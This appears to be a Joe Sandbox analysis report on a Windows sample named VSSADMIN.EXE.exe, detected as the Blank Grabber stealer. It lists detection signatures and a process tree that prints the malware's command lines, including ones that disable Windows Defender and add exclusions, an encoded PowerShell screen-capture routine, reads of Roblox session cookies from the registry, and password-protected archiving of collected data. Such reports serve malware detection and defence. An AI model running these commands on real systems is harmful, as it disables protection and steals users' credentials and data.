Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VSSADMIN.EXE.exe

Overview

General Information

Sample Name:VSSADMIN.EXE.exe
Analysis ID:1309234
MD5:b8e16b93be678043ec587ec1c759c2de
SHA1:a8c98ba05ac710a92c4df15956f81cf81073746f
SHA256:15dd97919ebcb246add4fc9e9b201bdd67da510c79f8d89cb4edc7fbf64858fa
Tags:exeHUN
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Blank Grabber
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Multi AV Scanner detection for dropped file
Drops PE files to the startup folder
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Removes signatures from Windows Defender
Modifies existing user documents (likely ransomware behavior)
May check the online IP address of the machine
DLL side loading technique detected
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Drops PE files with a suspicious file extension
Bypasses PowerShell execution policy
Modifies the hosts file
Very long command line found
Suspicious powershell command line found
Modifies Windows Defender protection settings
Potentially malicious time measurement code found
Potential dropper URLs found in powershell memory
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • VSSADMIN.EXE.exe (PID: 6856 cmdline: C:\Users\user\Desktop\VSSADMIN.EXE.exe MD5: B8E16B93BE678043EC587EC1C759C2DE)
    • VSSADMIN.EXE.exe (PID: 6872 cmdline: C:\Users\user\Desktop\VSSADMIN.EXE.exe MD5: B8E16B93BE678043EC587EC1C759C2DE)
      • cmd.exe (PID: 6900 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7036 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 6908 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7028 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 95000560239032BC68B4C2FDFCDEF913)
        • MpCmdRun.exe (PID: 2996 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: A267555174BFA53844371226F482B86B)
      • cmd.exe (PID: 6936 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • tasklist.exe (PID: 7060 cmdline: tasklist /FO LIST MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
      • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6448 cmdline: wmic csproduct get uuid MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 1724 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 5252 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: E3DACF0B31841FA02064B4457D44B357)
      • cmd.exe (PID: 5280 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6616 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: E3DACF0B31841FA02064B4457D44B357)
      • cmd.exe (PID: 5812 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5348 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 5396 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6608 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 6732 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6920 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 6476 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • tasklist.exe (PID: 6560 cmdline: tasklist /FO LIST MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
      • cmd.exe (PID: 6580 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6156 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: E3DACF0B31841FA02064B4457D44B357)
      • cmd.exe (PID: 6596 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6128 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 95000560239032BC68B4C2FDFCDEF913)
          • csc.exe (PID: 6704 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 1768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 4512 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • attrib.exe (PID: 5140 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: FDC601145CD289C6FBC96D3F805F3CD7)
      • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • attrib.exe (PID: 5196 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: FDC601145CD289C6FBC96D3F805F3CD7)
      • cmd.exe (PID: 6508 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • tasklist.exe (PID: 6848 cmdline: tasklist /FO LIST MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
      • cmd.exe (PID: 5204 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7068 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 1008 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6972 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 4512 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 6692 cmdline: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 6772 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5288 cmdline: wmic os get Caption MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 1724 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5260 cmdline: wmic computersystem get totalphysicalmemory MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 6700 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6380 cmdline: wmic csproduct get uuid MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 5428 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6592 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 95000560239032BC68B4C2FDFCDEF913)
